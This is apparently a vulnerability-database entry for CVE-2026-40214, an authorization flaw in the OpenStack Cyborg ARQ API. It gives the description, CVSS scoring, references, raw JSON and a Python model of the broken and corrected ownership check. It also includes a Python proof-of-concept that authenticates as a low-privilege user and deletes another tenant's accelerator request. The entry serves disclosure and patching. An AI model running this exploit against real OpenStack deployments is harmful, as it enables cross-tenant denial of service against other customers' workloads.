Security Vulnerability Report
CVE-2026-40214 CVSS 6.3 MEDIUM

CVE-2026-40214

Published: 2026-05-07 22:16:35
Last Modified: 2026-05-08 16:16:11

Description

In OpenStack Cyborg before 16.0.1, the Accelerator Request (ARQ) API does not enforce project ownership at any layer. The project_id column in the database is never populated (NULL for every ARQ), database queries have no project filtering, and policy checks are self-referential (the authorize_wsgi decorator compares the caller's project_id with itself rather than the target resource). Any authenticated non-admin user can complete various actions such as deleting ARQs bound to other projects' instances, aka cross-tenant denial of service.
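As an added illustration, not Cyborg's code and not part of this record, the following Python models the self-referential check the description names beside a check that compares the caller with the target ARQ's recorded owner; `Context`, `ARQ` and the in-memory `ARQS` table are constructed stand-ins for the request context and the database.

```python
# Added example, not Cyborg's code: a minimal model of the ownership check the
# advisory describes, showing the self-referential comparison beside a check
# that compares the caller against the target ARQ's recorded owner.
from collections import namedtuple

Context = namedtuple("Context", "project_id is_admin", defaults=(False,))  # caller
ARQ = namedtuple("ARQ", "uuid project_id")  # project_id is NULL in vulnerable rows

# Constructed stand-in for the ARQ table (hypothetical values).
ARQS = {
    "arq-a": ARQ("arq-a", "project-a"),
    "arq-b": ARQ("arq-b", "project-b"),
    "arq-null": ARQ("arq-null", None),
}

def authorize_broken(func):
    """Models the flaw: the caller's project_id is compared with itself,
    so the check can never fail for any authenticated caller."""
    def wrapper(ctx, arq_uuid):
        if not ctx.is_admin and ctx.project_id != ctx.project_id:
            raise PermissionError(arq_uuid)
        return func(ctx, arq_uuid)
    return wrapper

def authorize_owner(func):
    """Corrected model: the target ARQ's owner is compared with the caller,
    and an unpopulated (NULL) owner fails closed."""
    def wrapper(ctx, arq_uuid):
        owner = ARQS[arq_uuid].project_id
        if not ctx.is_admin and (owner is None or owner != ctx.project_id):
            raise PermissionError(arq_uuid)
        return func(ctx, arq_uuid)
    return wrapper

def _delete(ctx, arq_uuid):
    return f"deleted {arq_uuid}"  # no real deletion; the decision is the point

delete_arq_broken = authorize_broken(_delete)
delete_arq_fixed = authorize_owner(_delete)

def attempt(delete_fn, ctx, arq_uuid):
    """Return 'deleted' or 'forbidden' so the two variants can be compared."""
    try:
        delete_fn(ctx, arq_uuid)
        return "deleted"
    except PermissionError:
        return "forbidden"
```

With the broken decorator a non-admin caller from project-a is allowed through against project-b's ARQ; the owner-based check rejects it, rejects rows whose owner was never populated, and still allows the real owner and an admin.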

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

OpenStack Cyborg < 16.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept for CVE-2026-40214
# This script demonstrates how a non-admin user can delete ARQs belonging to other tenants.
import requests

# Attacker's credentials (low privilege user)
AUTH_URL = "https://openstack-api:5000/v3/auth/tokens"
CYBORG_URL = "https://openstack-api:666/v2/accelerator_requests"
USERNAME = "attacker_user"
PASSWORD = "attacker_pass"
PROJECT_ID = "attacker_project_id"


def get_token():
    # Authenticate and get token
    payload = {
        "auth": {
            "identity": {
                "methods": ["password"],
                "password": {
                    "user": {
                        "name": USERNAME,
                        "password": PASSWORD,
                        "domain": {"name": "Default"}
                    }
                }
            },
            "scope": {"project": {"id": PROJECT_ID}}
        }
    }
    headers = {"Content-Type": "application/json"}
    resp = requests.post(AUTH_URL, json=payload, headers=headers, verify=False)
    return resp.headers.get("X-Subject-Token")


def exploit():
    token = get_token()
    headers = {"X-Auth-Token": token}
    # 1. List ARQs. Due to the vulnerability, this might return ARQs from all projects or allow deletion by ID.
    # In this PoC, we assume the attacker knows the UUID of a victim's ARQ (e.g., via enumeration or leaked ID).
    victim_arq_uuid = "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee"
    print(f"Attempting to delete ARQ: {victim_arq_uuid} belonging to another tenant...")
    # 2. Send DELETE request
    delete_url = f"{CYBORG_URL}/{victim_arq_uuid}"
    resp = requests.delete(delete_url, headers=headers, verify=False)
    if resp.status_code == 204:
        print("[+] Success: ARQ deleted. Cross-tenant denial of service achieved.")
    else:
        print(f"[-] Failed: Status code {resp.status_code}")


if __name__ == "__main__":
    exploit()
```

References

https://bugs.launchpad.net/openstack-cyborg/+bug/2144056
https://security.openstack.org/ossa/OSSA-2026-011.html
https://www.openwall.com/lists/oss-security/2026/05/07/6

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-40214",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-07T22:16:35.047",
    "lastModified": "2026-05-08T16:16:10.900",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In OpenStack Cyborg before 16.0.1, the Accelerator Request (ARQ) API does not enforce project ownership at any layer. The project_id column in the database is never populated (NULL for every ARQ), database queries have no project filtering, and policy checks are self-referential (the authorize_wsgi decorator compares the caller's project_id with itself rather than the target resource). Any authenticated non-admin user can complete various actions such as deleting ARQs bound to other projects' instances, aka cross-tenant denial of service."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-282"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://bugs.launchpad.net/openstack-cyborg/+bug/2144056",
        "source": "[email protected]"
      },
      {
        "url": "https://security.openstack.org/ossa/OSSA-2026-011.html",
        "source": "[email protected]"
      },
      {
        "url": "https://www.openwall.com/lists/oss-security/2026/05/07/6",
        "source": "[email protected]"
      }
    ]
  }
}
```